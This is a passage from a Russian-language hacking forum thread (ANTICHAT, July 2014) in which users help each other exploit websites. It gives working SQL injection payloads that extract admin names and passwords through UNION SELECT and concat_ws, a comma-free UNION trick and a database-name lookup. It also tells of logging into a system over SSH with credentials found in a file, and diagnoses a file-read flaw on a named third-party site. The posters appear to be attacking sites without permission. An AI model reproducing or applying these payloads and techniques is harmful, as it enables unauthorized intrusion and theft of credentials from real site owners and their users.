ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.07.2014, 00:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от Грабитель
Грабитель said:
Пример запроса через конструкцию union select можно? Или Error Based если возможно провести запрос без использования запятых.
Спасибо.
Один из вариантов:
Сообщение от None
union select 1,2,3 == union select * from (select 1)a join (select 2)b join (select 3)c
|
|
|
|
20.07.2014, 00:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
69791
Репутация:
-7
|
|
Сообщение от UXOR
UXOR said:
Один из вариантов:
Все получилось, спасибо вам за помощь.
|
|
|
|
20.07.2014, 18:28
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara.
Доступ оказался доступом по SSH
Зашёл и обнаружил проблему -
Из под шелла (пользователь user1):
cd home
ls -la
5 папок с датой за июль
А из под SSH(пользователь sara):
cd home
ls -la
3 папки с датой за июнь
Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно.
Теперь вопрос - почему так? Почему разные даты и разное количество папок?
Вывод id
user1:
uid=510(user1) gid=500(user) groups=500(user)
user:
uid=500(user) gid=500(user) groups=500(user)
sara:
uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)
|
|
|
20.07.2014, 19:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
кто подскажет, что за ошибка? sql inj или нет?
Код:
Code:
hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427
|
|
|
|
21.07.2014, 00:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от vikler
vikler said:
кто подскажет, что за ошибка? sql inj или нет?
Код:
Code:
hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427
Сообщение от None
The cause of this exception was: java.io.FileNotFoundException: \\Webserver1\inetpub\wwwroot\webimages\entertainme nt\PREVIEWS\ssz\P-ssz103540xx .jpg (The system cannot find the file specified).
Чтение файлов же.
Пилите аналоги нуллбайта в жаве.
|
|
|
|
21.07.2014, 03:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Сообщение от madhatter
madhatter said:
Чтение файлов же.
Пилите аналоги нуллбайта в жаве.
ага, точно, спасибо!
|
|
|
|
21.07.2014, 15:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
12164
Репутация:
1
|
|
Парни, такая ситуация.
Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.
Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--
Ответ - Table 'site.admin' doesn't exist
Подскажите, что за ситуация и как быть?
|
|
|
|
21.07.2014, 17:22
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607
Репутация:
19
|
|
Сообщение от billybonse
billybonse said:
Парни, такая ситуация.
Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.
Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--
Ответ - Table 'site.admin' doesn't exist
Подскажите, что за ситуация и как быть?
запрос должен быть таким примерно
http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
|
|
|
|
21.07.2014, 17:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
12164
Репутация:
1
|
|
Сообщение от Cybersteger
Cybersteger said:
запрос должен быть таким примерно
http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
Название базы radiesse
Table 'radiesse.admin' doesn't exist
|
|
|
|
21.07.2014, 22:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
12164
Репутация:
1
|
|
Неужели никто не знает, что делать?
Еще пару вопросов, если позволите.
1. нашел уязвимый сайт, http://site.com/pages.php?id=-31%20union%20select%201,2,3,4,5--, выдает цифру 4
дальше пишу http://site.com/pages.php?id=-31%20union%20select%201,2,3,version(),5-- пишет 403 Forbidden
Почему?
2. Опять уязвимый сайт http://www.site.by/pages.php?id=7645
Перебираю колонки, сначала пишет he used SELECT statements have a different number of columns in query, дохожу до цифры 5, пишет Unknown column 'parent_id' in 'field list' in query. Если продолжаю перебирать колонки, опять выдает ошибку "неверное число колонок". Это иньекция или нет?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
